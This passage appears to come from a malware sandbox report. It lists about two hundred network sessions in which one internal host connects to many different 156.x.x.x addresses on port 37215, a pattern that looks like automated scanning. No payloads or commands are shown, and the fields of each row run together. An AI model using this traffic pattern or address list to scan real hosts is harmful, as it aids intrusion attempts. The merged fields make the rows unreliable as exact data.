                                                                            15937192.168.2.1553214156.250.111.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15938192.168.2.1542154156.43.144.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15939192.168.2.1533106156.30.32.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15940192.168.2.1535722156.191.241.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15941192.168.2.1560528156.97.138.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15942192.168.2.1538306156.36.117.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15943192.168.2.1553312156.129.251.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15944192.168.2.1541684156.98.16.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15945192.168.2.1551418156.20.246.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15946192.168.2.1543636156.15.107.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15947192.168.2.1535650156.190.159.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15948192.168.2.1551882156.157.39.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15949192.168.2.1548486156.202.193.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15950192.168.2.1540804156.84.210.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15951192.168.2.1541750156.204.135.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15952192.168.2.1555672156.173.135.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15953192.168.2.1540774156.242.58.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15954192.168.2.1546586156.206.148.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15955192.168.2.1552700156.34.157.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15956192.168.2.1544380156.5.179.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15957192.168.2.1551696156.76.5.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15958192.168.2.1560566156.18.46.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15959192.168.2.1534836156.101.67.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15960192.168.2.1536174156.41.39.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15961192.168.2.1553884156.72.118.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15962192.168.2.1551396156.243.236.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15963192.168.2.1551882156.52.116.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15964192.168.2.1542362156.145.175.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15965192.168.2.1551612156.38.99.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15966192.168.2.1542778156.95.233.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15967192.168.2.1545316156.201.149.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15968192.168.2.1559546156.145.130.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15969192.168.2.1550608156.43.83.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15970192.168.2.1537330156.43.93.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15971192.168.2.1541176156.210.251.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15972192.168.2.1536248156.171.86.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15973192.168.2.1559148156.60.22.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15974192.168.2.1557680156.175.246.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15975192.168.2.1542794156.166.91.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15976192.168.2.1555362156.13.254.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15977192.168.2.1549754156.11.226.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15978192.168.2.1535448156.163.209.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15979192.168.2.1536338156.47.55.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15980192.168.2.1560248156.183.186.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15981192.168.2.1540356156.210.23.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15982192.168.2.1535314156.229.226.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15983192.168.2.1546258156.186.58.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15984192.168.2.1550086156.12.208.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15985192.168.2.1546132156.199.17.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15986192.168.2.1559510156.34.238.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15987192.168.2.1552232156.98.174.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15988192.168.2.1536516156.27.223.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15989192.168.2.1552584156.197.20.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15990192.168.2.1549652156.200.193.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15991192.168.2.1543152156.75.145.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15992192.168.2.1539282156.243.25.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15993192.168.2.1545536156.70.187.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15994192.168.2.1543712156.222.20.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15995192.168.2.1554956156.32.205.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15996192.168.2.1556666156.37.176.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15997192.168.2.1544284156.201.69.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15998192.168.2.1544860156.82.111.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15999192.168.2.1536588156.24.184.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16000192.168.2.1541428156.99.154.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16001192.168.2.1551254156.197.173.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16002192.168.2.1551884156.56.138.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16003192.168.2.1559878156.253.201.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16004192.168.2.1544028156.31.199.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16005192.168.2.1546050156.250.217.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16006192.168.2.1534342156.183.96.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16007192.168.2.1540850156.251.46.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16008192.168.2.1545700156.219.164.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16009192.168.2.1556296156.111.163.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16010192.168.2.1535196156.62.230.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16011192.168.2.1560492156.83.202.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16012192.168.2.1556138156.31.135.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16013192.168.2.1547908156.216.245.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16014192.168.2.1549774156.0.53.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16015192.168.2.1551840156.120.81.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16016192.168.2.1541350156.215.196.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16017192.168.2.1533258156.89.5.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16018192.168.2.1559532156.106.228.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16019192.168.2.1532898156.78.235.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16020192.168.2.1533654156.220.84.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16021192.168.2.1534410156.130.58.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16022192.168.2.1559492156.67.209.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16023192.168.2.1556240156.111.47.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16024192.168.2.1559016156.24.228.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16025192.168.2.1537414156.165.117.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16026192.168.2.1552234156.206.228.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16027192.168.2.1559810156.193.46.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16028192.168.2.1560194156.129.110.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16029192.168.2.1538664156.40.79.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16030192.168.2.1558360156.226.98.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16031192.168.2.1559114156.243.130.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16032192.168.2.1552980156.166.4.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16033192.168.2.1558380156.35.104.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16034192.168.2.1557264156.37.78.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16035192.168.2.1541880156.112.31.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16036192.168.2.1559454156.3.48.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16037192.168.2.1543834156.61.195.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16038192.168.2.1546564156.225.214.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16039192.168.2.1548232156.80.255.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16040192.168.2.1540130156.241.46.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16041192.168.2.1556138156.181.56.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16042192.168.2.1544090156.237.117.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16043192.168.2.1548606156.129.1.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16044192.168.2.1534794156.165.159.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16045192.168.2.1554304156.228.66.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16046192.168.2.1551292156.43.170.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16047192.168.2.1538150156.104.80.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16048192.168.2.1544082156.214.7.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16049192.168.2.1560194156.150.132.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16050192.168.2.1537324156.110.115.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16051192.168.2.1558060156.128.138.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16052192.168.2.1538026156.49.53.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16053192.168.2.1535764156.224.65.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16054192.168.2.1546758156.232.155.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16055192.168.2.1550266156.125.182.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16056192.168.2.1552770156.22.86.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16057192.168.2.1558882156.93.206.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16058192.168.2.1539210156.79.129.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16059192.168.2.1551918156.246.201.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16060192.168.2.1548418156.245.198.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16061192.168.2.1546300156.30.96.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16062192.168.2.1534612156.217.89.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16063192.168.2.1557712156.188.246.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16064192.168.2.1536338156.194.109.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16065192.168.2.1539886156.239.240.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16066192.168.2.1558920156.218.207.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16067192.168.2.1559080156.109.77.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16068192.168.2.1556600156.180.112.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16069192.168.2.1559856156.97.164.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16070192.168.2.1553808156.23.63.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16071192.168.2.1556484156.21.10.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16072192.168.2.1559232156.110.74.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16073192.168.2.1539674156.173.40.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16074192.168.2.1554692156.26.60.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16075192.168.2.1555392156.73.42.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16076192.168.2.1540680156.174.44.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16077192.168.2.1543892156.42.187.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16078192.168.2.1557380156.164.252.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16079192.168.2.1554708156.22.208.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16080192.168.2.1540618156.30.6.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16081192.168.2.1560724156.95.207.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16082192.168.2.1542204156.29.176.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16083192.168.2.1552534156.156.51.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16084192.168.2.1533434156.169.213.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16085192.168.2.1552844156.219.91.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16086192.168.2.1544834156.64.255.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16087192.168.2.1557152156.61.181.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16088192.168.2.1550932156.152.89.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16089192.168.2.1534930156.174.40.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16090192.168.2.1532806156.243.25.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16091192.168.2.1549012156.77.144.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16092192.168.2.1534228156.225.157.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16093192.168.2.1550986156.112.223.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16094192.168.2.1548342156.97.26.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16095192.168.2.1552814156.229.245.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16096192.168.2.1533830156.143.94.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16097192.168.2.1548618156.23.126.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16098192.168.2.1551734156.186.143.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16099192.168.2.1552552156.40.190.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16100192.168.2.1555134156.2.107.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16101192.168.2.1546172156.76.86.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16102192.168.2.1552454156.48.156.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16103192.168.2.1551682156.184.227.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16104192.168.2.1551316156.80.201.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16105192.168.2.1558352156.211.33.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16106192.168.2.1546256156.35.188.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16107192.168.2.1559770156.204.25.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16108192.168.2.1539712156.28.27.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16109192.168.2.1554046156.126.26.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16110192.168.2.1549798156.66.180.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16111192.168.2.1542134156.148.168.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16112192.168.2.1553702156.159.246.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16113192.168.2.1535552156.110.184.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16114192.168.2.1539536156.98.112.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16115192.168.2.1540788156.143.233.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16116192.168.2.1540358156.164.156.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16117192.168.2.1542936156.239.49.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16118192.168.2.1546736156.118.232.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16119192.168.2.1543622156.56.42.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16120192.168.2.1544710156.126.244.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16121192.168.2.1556540156.162.177.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16122192.168.2.1549026156.114.254.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16123192.168.2.1536886156.51.162.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16124192.168.2.1548346156.26.252.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16125192.168.2.1557826156.58.41.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16126192.168.2.1541274156.207.225.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16127192.168.2.1543838156.109.119.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16128192.168.2.1538612156.232.95.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16129192.168.2.1535084156.205.80.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16130192.168.2.1539066156.131.27.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16131192.168.2.1533702156.217.185.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16132192.168.2.1546616156.51.69.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16133192.168.2.1549656156.191.216.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16134192.168.2.1553118156.218.138.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16135192.168.2.1559798156.17.184.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16136192.168.2.1535160156.9.233.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
